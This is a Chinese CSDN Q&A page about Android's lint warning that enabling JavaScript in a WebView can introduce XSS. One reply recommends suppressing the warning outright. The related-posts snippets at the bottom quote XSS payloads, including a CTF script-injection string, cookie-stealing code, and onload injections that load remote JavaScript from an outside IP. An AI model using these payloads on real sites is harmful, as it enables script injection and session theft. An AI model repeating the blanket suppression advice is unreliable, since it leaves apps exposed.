2 u011359326 u011359326 于 2016.03.21 21:43 提问

android中设置支持javascript会引入xss变量到你的程序中,请检查清楚

Using setJavaScriptEnabled can introduce XSS vulnerabilities into you application, review carefully.

如何理解上面这句英语啊??

2个回答

u012215068
u012215068   2016.03.21 23:13
已采纳

你指的是在webView上设置支持JavaScript么?

u011359326
u011359326 是的,正如你所说
2 年多之前 回复
yzsunlight
yzsunlight   2016.03.21 23:16

@SuppressLint("SetJavaScriptEnabled")
忽略这个警告

yzsunlight
yzsunlight 回复提问之星: 只是提示会有这个攻击。
2 年多之前 回复
yzsunlight
yzsunlight 回复提问之星: Xss是跨站脚本攻击,它只是提醒你会有这个风险
2 年多之前 回复
u011359326
u011359326 为什么忽略掉呢
2 年多之前 回复
Csdn user default icon
上传中...
上传图片
插入图片
准确详细的回答,更有利于被提问者采纳,从而获得C币。复制、灌水、广告等回答会被删除,是时候展现真正的技术了!
其他相关推荐
xss 利用"data:"来xss许多把"javascript:"关键字进行了过滤
XSS with Data URI Scheme 以前一个机缘巧合,写过《利用data:进行XSS测试》,当时发现可以利用"data:"来xss许多把"javascript:"关键字进行了过滤的页面。 今晚又一个机缘巧合,重新接触到了data uri scheme,做了一些测试。这些测试都是基于Chrome和FireFox进行的。IE对data uri scheme 有严
解决:自动检查显示器颜色。请检查是否设置了 DISPLAY 变量
在linux中安装oracle时,有时会遇到这样的问题   执行 ./runInstaller 出现: >>> 无法使用命令 /usr/openwin/bin/xdpyinfo 自动检查显示器颜色。请检查是否设置了 DISPLAY 变量。 未通过   解决办法: 首先在oracle用户下面执行 export DISPLAY=192.168.1.14:1.0  (192.168.
Android中系统设置中的清除数据究竟会清除哪些数据
今天中的一个story突然提到了系统设置中的清理数据,后来开始思考究竟系统的应用的这个清理功能,究竟会清理那些数据。 于是开始研究,以com.mx.browser为例,思路大概为首先为/data/data/com.mx.browser下的每一个文件夹下建立一个标志文件,这里为1.txt,然后执行清理数据操作,最后对比结果。 首先,进行清楚数据之前的的各个文件夹的情况。 /data/dat
XSS教程
引言 本文译至《Excess Xss: A comprehensive tutorial on cross-site scripting》,由于译者水平有限,翻译不当之处,敬请批评指正。 一、概览   1、什么是XSS 跨站脚本(XSS)是代码注入攻击的一种。通过这种方式,攻击者可以在其他用户的浏览器中执行恶意的JavaScript代码。 攻击者并不直接锁定受害者,而是利用受害者经常访
bugku xss
XSS注入测试 1、请注入一段XSS代码,获取Flag值 2、必须包含alert(_key_),_key_会自动被替换 题解: 首先我们查看源代码 发现可以通过xss注入  所以我们只需将转义即可  于是我们构造?id=\u003cscript\u003ealert(_key_)\u003c/script\u003e 即可获得flag 如有疑问请联系qq:834368404
用Notepad++编辑tnsnames.ora结果保存出错:请检查文件是否在别的程序中打开
是因为 tnsnames.ora的主目录C:\Program Files (x86)\Oracle\ora92\network\ADMIN没有权限, 此目录下增加下图中的权限 如果还不行,可以吧常规里的 只读去掉 再去编辑就OK了。
网络安全之XSS
1.如果收到被害者的cookie. 其实可以在自己网站上做一个脚本来进行cookie收集。。。也可以用第三方的cookie收集平台。。 比如或者xss.la等。这两个平台都是禁止注册的。。自己写一个就好.很简单 熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了 var x=new Image(); try { var myope
XSS调用外部JS
jquery和原生两种方法:  1. onload="jQuery.getScript('JS Address')  2. " onload="with(document)body.appendChild(createElement('script')).src='http://172.16.96.13/js/xss.js'"
无法使用命令 /usr/bin/xdpyinfo 自动检查显示器颜色。请检查是否设置了 DISPLAY 变量。 未通过
--root 用户 切换为 oracle 账户 到 /home/oracle/database/ 下执行安装命令。 虚拟机 redhat 系统安装oracle 时,即 ./runInstaller,出现此错误 >>> 无法使用命令 /usr/bin/xdpyinfo 自动检查显示器颜色。请检查是否设置了 DISPLAY 变量。 未通过 解决办法: 注销
Android手机设置中的清除App数据选项的思考?
今天读到SharedPreferences源码的时候,一时突发奇想手机设置中的真对单个app清除数据的时候会清除哪些数据,虽然之前一直都知道SharedPreferences这样的数据会被清除掉,但是一直没有实践过,因此做了个测试用来验证这个结论。 测试如下:public final String TAG = MainActivity.class.getSimpleName(); priva